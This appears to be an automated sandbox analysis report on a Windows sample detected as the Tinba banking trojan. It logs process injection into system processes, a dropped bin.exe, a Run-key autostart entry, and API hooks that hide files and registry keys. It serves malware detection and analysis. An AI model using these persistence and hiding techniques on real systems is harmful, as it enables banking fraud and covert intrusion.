            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: SearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comm
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected Tinba Banker
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 6188, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winver.exe PID: 6384, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: bin.exe PID: 6940, type: MEMORYSTR

            E-Banking Fraud

            barindex
            Yara detected Tinba Banker
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 6188, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winver.exe PID: 6384, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: bin.exe PID: 6940, type: MEMORYSTR
            Source: C:\Windows\explorer.exeCode function: 3_2_01392270 NtQueryDirectoryFile,3_2_01392270
            Source: C:\Windows\explorer.exeCode function: 3_2_01391EE1 NtCreateUserProcess,3_2_01391EE1
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC21D1 NtEnumerateValueKey,4_2_00AC21D1
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_022200050_2_02220005
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_022218450_2_02221845
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02220EA90_2_02220EA9
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E18212_2_047E1821
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E0E852_2_047E0E85
            Source: C:\Windows\explorer.exeCode function: 3_2_013918213_2_01391821
            Source: C:\Windows\explorer.exeCode function: 3_2_01390E853_2_01390E85
            Source: C:\Windows\explorer.exeCode function: 3_2_034518213_2_03451821
            Source: C:\Windows\explorer.exeCode function: 3_2_03450E853_2_03450E85
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0E854_2_00AC0E85
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC18214_2_00AC1821
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910E855_2_00910E85
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_009118215_2_00911821
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0E856_2_009A0E85
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A18216_2_009A1821
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50E857_2_00A50E85
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A518217_2_00A51821
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40E858_2_00D40E85
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D418218_2_00D41821
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50E859_2_00B50E85
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B518219_2_00B51821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_0011182110_2_00111821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110E8510_2_00110E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_001C182112_2_001C1821
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_001C0E8512_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_0224000512_2_02240005
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_02240EA912_2_02240EA9
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_00AB0E8517_2_00AB0E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_00AB182117_2_00AB1821
            Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_0029182118_2_00291821
            Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_00290E8518_2_00290E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 19_2_001C182119_2_001C1821
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 19_2_001C0E8519_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 19_2_0241000519_2_02410005
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 19_2_02410EA919_2_02410EA9
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 21_2_0058182121_2_00581821
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 21_2_00580E8521_2_00580E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_003D182122_2_003D1821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_003D0E8522_2_003D0E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_00900E8523_2_00900E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_0090182123_2_00901821
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_0018182124_2_00181821
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_00180E8524_2_00180E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_0019182126_2_00191821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_00190E8526_2_00190E85
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_0001182128_2_00011821
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_00010E8528_2_00010E85
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_009F0E8529_2_009F0E85
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_009F182129_2_009F1821
            Source: C:\Windows\System32\conhost.exeCode function: 30_2_00880E8530_2_00880E85
            Source: C:\Windows\System32\conhost.exeCode function: 30_2_0088182130_2_00881821
            Source: C:\Windows\System32\dllhost.exeCode function: 31_2_00980E8531_2_00980E85
            Source: C:\Windows\System32\dllhost.exeCode function: 31_2_0098182131_2_00981821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 33_2_00A20E8533_2_00A20E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 33_2_00A2182133_2_00A21821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 34_2_0006182134_2_00061821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 34_2_00060E8534_2_00060E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 35_2_0307182135_2_03071821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 35_2_03070E8535_2_03070E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 36_2_02CE0E8536_2_02CE0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 36_2_02CE182136_2_02CE1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 37_2_0064182137_2_00641821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 37_2_00640E8537_2_00640E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 38_2_006D182138_2_006D1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 38_2_006D0E8538_2_006D0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 39_2_02EF0E8539_2_02EF0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 39_2_02EF182139_2_02EF1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 40_2_0147182140_2_01471821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 40_2_01470E8540_2_01470E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 41_2_0116182141_2_01161821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 41_2_01160E8541_2_01160E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 42_2_01FF0E8542_2_01FF0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 42_2_01FF182142_2_01FF1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 43_2_0263182143_2_02631821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 43_2_02630E8543_2_02630E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 44_2_00810E8544_2_00810E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 44_2_0081182144_2_00811821
            Source: C:\Windows\System32\conhost.exeCode function: String function: 00883653 appears 35 times
            Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 047E3653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 00913653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 009A3653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 00D43653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 009F3653 appears 35 times
            Source: C:\Windows\System32\ctfmon.exeCode function: String function: 00A53653 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 03453653 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 01393653 appears 34 times
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: String function: 00183653 appears 35 times
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: String function: 00013653 appears 35 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: String function: 02243677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: String function: 02413677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: String function: 001C3653 appears 70 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 02EF3653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 01473653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 00813653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 02633653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 02CE3653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 006D3653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 00643653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 03073653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 01163653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: String function: 01FF3653 appears 35 times
            Source: C:\Windows\System32\smartscreen.exeCode function: String function: 00293653 appears 35 times
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: String function: 00B53653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00063653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00193653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 003D3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00113653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00903653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00AB3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00A23653 appears 35 times
            Source: C:\Windows\System32\sihost.exeCode function: String function: 00AC3653 appears 35 times
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: String function: 00583653 appears 35 times
            Source: C:\Windows\System32\dllhost.exeCode function: String function: 00983653 appears 35 times
            Source: C:\Users\user\Desktop\java.exeCode function: String function: 02223677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeSection loaded: nss3.dllJump to behavior
            Source: java.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: classification engineClassification label: mal100.bank.expl.evad.winEXE@10/10@4/3
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02220005 ExitProcess,GetProcAddress,IsWow64Process,GetModuleHandleW,GetStartupInfoA,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA,0_2_02220005
            Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\E38A1E29Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
            Source: C:\Windows\SysWOW64\winver.exeMutant created: \Sessions\1\BaseNamedObjects\E38A1E29
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
            Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: java.exeReversingLabs: Detection: 89%
            Source: unknownProcess created: C:\Users\user\Desktop\java.exe C:\Users\user\Desktop\java.exe
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe" Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe" Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KIdSIJzxFEgRWLYApSEFvZXik.exe, 0000002B.00000002.2969338843.000000000051E000.00000002.00000001.01000000.00000007.sdmp
            Source: java.exeStatic PE information: section name: .imports
            Source: bin.exe.2.drStatic PE information: section name: .imports
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02220C1A push edi; ret 0_2_02220C56
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02220B89 push edi; ret 0_2_02220C56
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E0B65 push edi; ret 2_2_047E0C32
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E0BF6 push edi; ret 2_2_047E0C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01390B65 push edi; ret 3_2_01390C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01390BF6 push edi; ret 3_2_01390C32
            Source: C:\Windows\explorer.exeCode function: 3_2_03450B65 push edi; ret 3_2_03450C32
            Source: C:\Windows\explorer.exeCode function: 3_2_03450BF6 push edi; ret 3_2_03450C32
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0BF6 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0B65 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910BF6 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910B65 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0BF6 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0B65 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50BF6 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50B65 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40BF6 push edi; ret 8_2_00D40C32
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40B65 push edi; ret 8_2_00D40C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50BF6 push edi; ret 9_2_00B50C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50B65 push edi; ret 9_2_00B50C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110B65 push edi; ret 10_2_00110C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110BF6 push edi; ret 10_2_00110C32
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_001C0B65 push edi; ret 12_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_001C0BF6 push edi; ret 12_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_02240C1A push edi; ret 12_2_02240C56
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_02241A92 push esi; ret 12_2_02241A94
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_02241B61 push esi; ret 12_2_02241B63
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_02240B89 push edi; ret 12_2_02240C56
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_00AB0BF6 push edi; ret 17_2_00AB0C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_00AB0B65 push edi; ret 17_2_00AB0C32
            Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_00290B65 push edi; ret 18_2_00290C32
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeJump to dropped file

            Boot Survival

            barindex
            Creates autostart registry keys with suspicious names
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E38A1E29Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E38A1E29Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E38A1E29Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hooks files or directories query functions (used to hide files and directories)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
